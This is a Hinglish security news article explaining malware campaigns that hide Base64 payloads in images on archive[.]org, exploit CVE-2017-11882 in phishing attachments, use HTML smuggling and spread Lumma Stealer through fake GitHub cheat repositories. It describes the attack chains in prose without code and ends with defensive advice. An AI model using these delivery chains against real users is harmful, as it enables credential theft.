Cybercriminals ab advanced techniques ka use kar rahe hain malware deliver karne ke liye, jaise VIP Keylogger aur 0bj3ctivity Stealer, aur wo images ke andar malicious code chhupake attack kar rahe hain. Ye images archive[.]org pe hosted hoti hain aur attackers .NET loader ka use karte hain taaki final payloads deliver kar sakein.
Yeh attack kaise hota hai:
Phishing Email: Sabse pehle attacker ek phishing email bhejta hai, jo invoice ya purchase order ke naam pe hoti hai. Victim ko trick kiya jata hai ki wo ek attachment (jo aksar ek Microsoft Excel file hoti hai) open karein.
Vulnerabilities ka fayda uthana: Jab victim Excel file open karta hai, to ek Equation Editor (CVE-2017-11882) flaw ka use hota hai jo VBScript file download kar leta hai.
PowerShell Script: Yeh VBScript phir ek PowerShell script run karta hai jo ek malicious image download karta hai archive[.]org se. Ye image kuch aur nahi, balki Base64-encoded malicious code chhupaye hota hai.
Decoding aur Execution: PowerShell script is image ka code decode karti hai, aur fir usko ek .NET executable ke roop mein run kar deti hai. Yeh executable loader ka kaam karta hai jo final malware ko system pe install karta hai.
Payload Delivery: Loader phir VIP Keylogger ya 0bj3ctivity Stealer ko victim ke system pe install kar leta hai, jo sensitive information chura leta hai jaise passwords, keystrokes, aur personal data.
Yeh technique isliye effective hai kyunki images ko usually safe samjha jata hai, na users ko, na security systems ko. Jab malware ko kisi harmless cheez ke andar chhupaya jata hai, to wo aasani se detect nahi hota. Aur archive[.]org jese trusted platform par image host karna attackers ko aur zyada safe bana deta hai.
.NET loader is attack ka main part hai. Yeh malicious code ko chhupa leta hai aur ensure karta hai ki antivirus software usko detect na kare. Yeh loader final malware ko fetch aur execute karta hai, jo attack chain ka important part hota hai.
Yeh attack ek bada example hai ki kaise hackers legitimate resources aur clever tricks ka use kar ke apne attacks ko hide karte hain. Yeh dikhaata hai ki kaise even simple cheezein jaise images ko weapon banaya ja sakta hai malware deliver karne ke liye. Isliye humein apni security measures ko smart aur advanced banane ki zarurat hai, taki yeh hidden threats detect ho sakein.
Yeh attacks phishing emails se shuru hote hain, jo invoices ya purchase orders ke roop mein disguised hote hain. In emails ke through victims ko trick kiya jata hai ki wo malicious attachments, jaise Microsoft Excel files, open karein. Jab victim file open karta hai, to Equation Editor vulnerability (CVE-2017-11882) ka exploit hota hai, jo ek VBScript ko download kar leta hai.
Yeh VBScript phir ek PowerShell script ko run karta hai. Yeh PowerShell script image ko retrieve karti hai server se, jisme Base64-encoded malicious code chhupa hota hai. Jab image ka code decode hota hai, to .NET executable run hota hai, jo final step mein VIP Keylogger ko install kar leta hai.
VIP Keylogger victim ke system mein silently operate karta hai aur unka sensitive data, jaise keystrokes, passwords, aur credentials chura leta hai.
Yeh technique kaafi sophisticated hai, kyunki phishing emails ko aise design kiya jata hai ki victim ko real invoices ya purchase orders ka illusion ho. Aur hidden payload ko ek image ke through deliver karna, attackers ko detection se bachne mein madad karta hai.
Ek related campaign mein, malicious archive files ko quotation requests ke roop mein bheja jata hai. Yeh files victims ko JavaScript file run karne ke liye lure karti hain. Jaise hi victim JavaScript file ko execute karta hai, yeh file ek aur PowerShell script ko launch karti hai.
Yeh PowerShell script phir ek image ko retrieve karti hai server se, jo Base64-encoded malicious code ko chhupaye rakhta hai. Jab yeh code decode hota hai, to 0bj3ctivity Stealer deploy hota hai, jo victim ke system par silently install ho jata hai.
0bj3ctivity Stealer ka kaam hota hai sensitive user information ko chura lena, jaise passwords, login credentials, aur dusri personal details. Yeh stealer har type ke important data ko target karta hai jo attackers ko profit mein convert ho sakta hai.
Is attack mein bhi, attackers JavaScript aur PowerShell scripts ka use karke malicious payload ko image ke through deliver karte hain, jo apne aapko stealth mode mein rakhta hai aur detection se bachne mein madad karta hai. Ye method attackers ko low risk ke saath high reward deta hai.
Dono campaigns yeh dikhate hain ki malware kits ka use badh raha hai, jo attackers ko sophisticated operations execute karne mein madad dete hain, bina kisi high-level expertise ke. Yeh kits attackers ke liye ready-made solutions provide karte hain, jisse wo apne attacks ko asani se execute kar sakte hain, aur isme unhe complex coding ya deep knowledge ki zaroorat nahi padti.
VIP Keylogger jaise tools mein Snake Keylogger aur 404 Keylogger ke saath similar functionality dekhi gayi hai, jo yeh indicate karta hai ki in sab malware tools ka ek shared development base ho sakta hai. Matlab, ho sakta hai ki yeh sab ek hi developer group ya malware developer community ka kaam ho, jo apne tools ko customize karke alag-alag attacks mein use karte hain.
Iska matlab hai ki malware development ab commoditized ho gaya hai, aur attackers ko advanced attacks execute karne ke liye highly specialized skills ki zaroorat nahi hai. Pre-built malware kits se wo quickly apne operations ko scale up kar sakte hain, jisse unke attacks zyada effective aur persistent ho jate hain.
Attackers ab HTML smuggling ka use kar rahe hain, jisme wo malware jaise XWorm RAT ko AutoIt droppers ke through deliver karte hain. HTML smuggling ek technique hai jisme malicious HTML files ko legitimate-looking content ke andar hide kar diya jata hai, taaki wo easily detection se bach sakein.
Is technique mein, attacker HTML files ko is tarah craft karte hain ki wo hidden malicious code ko user ke browser ya system pe execute karte hain, bina unhe notice kiye. XWorm RAT ek remote access trojan hai, jo attackers ko victim ke system par full control deta hai.
Aur ek aur interesting trend yeh hai ki attackers ab Generative AI (GenAI) ka use kar rahe hain, jisse wo HTML files ko automatically generate kar sakein, aur apne attacks ko scale kar sakein. GenAI tools se attackers ko apne malicious files ko unique variations me bana kar attribution se bachne ka faida milta hai. Matlab, har attack ka pattern itna unique hota hai ki security systems ko identify karna mushkil ho jata hai.
Generative AI ke use se attackers ko apne malware ko faster, smarter aur unpredictable bana dene ka faida milta hai, jisse wo apne attacks ko effectively spread kar sakte hain aur detection ko avoid kar sakte hain.
Threat actors ab fake GitHub repositories create kar rahe hain, jisme wo video game cheats aur mods advertise karte hain. Yeh repositories gaming community ko target karte hain, jo usually game cheats aur mods download karte hain. Is tarah ke fake repositories ko legitimate aur popular gaming tools ke roop mein dikhaya jata hai, taaki users easily trust karen aur download karen.
In repositories ke andar, attackers Lumma Stealer jaise malware ko .NET droppers ke through distribute karte hain. Lumma Stealer ek information-stealer malware hai, jo victim ke system se sensitive information, jaise login credentials, bank details, aur personal data chura leta hai.
.NET droppers malware ko stealthily install karte hain, aur user ko pata bhi nahi chalta. Jab victim fake repository se files download karta hai, toh malicious code execute hota hai jo Lumma Stealer ko install kar leta hai. Yeh technique especially gaming communities ko target karti hai, kyunki wo gaming cheats aur mods ke liye frequently download karte hain.
Is tarah se attackers gaming industry ko target karte hain aur malware distribute karte hain, jisme GenAI aur automated malware kits ka bhi istemal ho sakta hai. Ye approach attackers ko low-effort aur high-reward attacks execute karne mein madad karti hai.
Haan, images, phishing emails, aur advanced automation tools jaise GenAI ka use karke, cybercriminals apne tactics ko kaafi sophisticated bana rahe hain. GenAI jaise tools attackers ko automatically generate aur scale karne ka mauka dete hain, jisse wo apne malicious campaigns ko zyada effective bana lete hain. Yeh tools unhe customized malware create karne mein madad karte hain, jisse attacks ko detect karna aur mitigate karna mushkil ho jata hai.
Phishing emails aur malicious images ka use karke attackers apne targets ko easily deceive kar lete hain, kyunki wo legitimate sources jaise invoices ya game cheats ka disguise use karte hain. Iske saath hi malware kits jo readily available hain, wo inexperienced attackers ko bhi powerful tools dete hain jise wo effective campaigns launch kar sakein, bina deep technical knowledge ke.
Is sab se yeh clear ho raha hai ki cybersecurity measures ko aur enhance karna zaroori ho gaya hai. Organizations aur individuals ko advanced detection mechanisms aur stronger defense strategies apnani chahiye, jaise AI-based threat detection systems, multi-factor authentication, aur user awareness training, taaki yeh sophisticated attacks ko pahle se roka ja sake.